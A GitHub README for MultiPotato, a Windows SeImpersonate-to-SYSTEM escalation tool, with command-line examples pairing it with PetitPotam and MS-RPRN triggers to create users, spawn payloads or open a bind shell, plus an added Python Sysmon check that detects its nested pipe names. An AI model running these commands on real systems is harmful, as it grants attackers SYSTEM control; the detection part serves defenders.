  • Stars: 493
  • Rank: 85,859 (Top 2 %)
  • Language: C++
  • License: GNU General Publi...
  • Created over 2 years ago
  • Updated over 2 years ago

MultiPotato

First of all - credit to @splinter_code & @decoder_it for RoguePotato, as this code is heavily based on it.

This is just another Potato to get SYSTEM via SeImpersonate privileges. But this one is different in the following ways:

  • It doesn't contain any SYSTEM auth trigger for weaponization. Instead, you integrate the trigger of your choice yourself.
  • It isn't limited to CreateProcessWithTokenW for spawning a new process. Instead you can choose between CreateProcessWithTokenW, CreateProcessAsUserW, CreateUser and BindShell.

So this project opens a named pipe server, impersonates any user connecting to it and afterwards performs one of the options mentioned above. If new SYSTEM auth triggers are published in the future, this tool can still be used to elevate privileges; you just need to use another pipe name in that case.

Examples:

  1. CreateUser with modified PetitPotam trigger:
c:\temp\MultiPotato> MultiPotato.exe -t CreateUser

By default you have 60 seconds (changeable via THEAD_TIMEOUT) for the SYSTEM account or any other account to authenticate. This can be done, for example, via an unpatched MS-EFSRPC function. By default MultiPotato listens on the pipe name \\.\pipe\pwned/pipe/srvsvc, which is meant to be used in combination with MS-EFSRPC. For other SYSTEM auth triggers you can adjust the pipe name via the -p parameter.

c:\temp\MultiPotato> PetitPotamModified.exe localhost/pipe/pwned localhost

Using PetitPotam.py as a trigger from a remote system with a valid low-privileged user is of course also possible.


  2. CreateProcessAsUserW with SpoolSample trigger:
c:\temp\MultiPotato> MultiPotato.exe -t CreateProcessAsUserW -p "pwned\pipe\spoolss" -e "C:\temp\stage2.exe"

And trigger it via

c:\temp\MultiPotato> MS-RPRN.exe \\192.168.100.150 \\192.168.100.150/pipe/pwned


Important: In my tests for MS-RPRN I could not use localhost or 127.0.0.1 as the target; this has to be the network IP address or FQDN. In addition, the Printer Service needs to be enabled for this to work.

  3. BindShell with SpoolSample PipeName:
c:\temp\MultiPotato> MultiPotato.exe -t BindShell -p "pwned\pipe\spoolss"

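From the defender's side, the naming pattern used in the examples above is itself a detection opportunity: the server pipe lives in a sub-path such as pwned\pipe\spoolss or pwned/pipe/srvsvc, so the trigger's RPC endpoint name lands under an attacker-chosen prefix instead of at the pipe root. The following Python check is an added example, not part of the MultiPotato project; it scans constructed records modelled on Sysmon Event ID 17 (Pipe Created, fields PipeName and Image) and flags any pipe name that still contains a "\pipe\" segment after Sysmon has stripped the \\.\pipe\ root. The sample records and the endpoint list are assumptions built from the README's own trigger/pipe pairs.

```python
import re
from dataclasses import dataclass

# Constructed sample records shaped like Sysmon Event ID 17 (Pipe Created).
# Not real telemetry; values are illustrative only.
SAMPLE_EVENTS = [
    {"PipeName": r"\spoolss", "Image": r"C:\Windows\System32\spoolsv.exe"},
    {"PipeName": r"\srvsvc", "Image": r"C:\Windows\System32\svchost.exe"},
    {"PipeName": r"\pwned\pipe\spoolss", "Image": r"C:\temp\MultiPotato.exe"},
    {"PipeName": r"\pwned/pipe/srvsvc", "Image": r"C:\temp\MultiPotato.exe"},
    {"PipeName": r"\mojo.1234.5678.abcdef", "Image": r"C:\Program Files\Browser\browser.exe"},
]

# RPC endpoint pipe names the README's triggers append to the chosen prefix
# (MS-EFSRPC -> srvsvc, MS-RPRN -> spoolss). Extend for other triggers.
KNOWN_ENDPOINTS = {"srvsvc", "spoolss"}

# Sysmon records PipeName relative to \\.\pipe\, so a further "\pipe\" or
# "/pipe/" segment inside the name means a nested, endpoint-mimicking path.
NESTED_PIPE = re.compile(r"[\\/]pipe[\\/]", re.IGNORECASE)


@dataclass
class Finding:
    pipe_name: str
    image: str
    reason: str


def check_pipe_event(event):
    """Return a Finding for a nested pipe path, or None for an ordinary pipe."""
    name = event["PipeName"]
    if not NESTED_PIPE.search(name):
        return None
    # Last path component, accepting either separator (the README uses both).
    leaf = re.split(r"[\\/]", name.strip("\\/"))[-1].lower()
    reason = "nested pipe path"
    if leaf in KNOWN_ENDPOINTS:
        reason += f" ending in RPC endpoint '{leaf}'"
    return Finding(name, event["Image"], reason)


def scan(events):
    """Run the check over a list of records and keep only the hits."""
    return [f for f in map(check_pipe_event, events) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"{finding.image}: {finding.pipe_name} ({finding.reason})")
```

Legitimate pipes created at the root (\spoolss, \srvsvc) pass untouched, so the rule keys on the nesting trick rather than on the endpoint names themselves.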

Why??

I recently had a penetration test, where I was able to pwn an MSSQL Server via SQL injection and XP_CMDShell. But all public Potatoes failed on this target system to elevate privileges from the service account to SYSTEM. The SYSTEM auth trigger was not the problem; instead, CreateProcessWithTokenW failed all the time with NTSTATUS Code 5 - access forbidden. This didn't really make sense to me and may be an edge case. One reason for that could be the local endpoint protection, which may have blocked the process creation after impersonating SYSTEM.

Therefore I searched for alternatives and asked some people on Twitter about it. Again, credit to @splinter_code for explaining to me how to do it via CreateProcessAsUserW, which worked fine on the pwned MSSQL server to get a SYSTEM C2 callback.
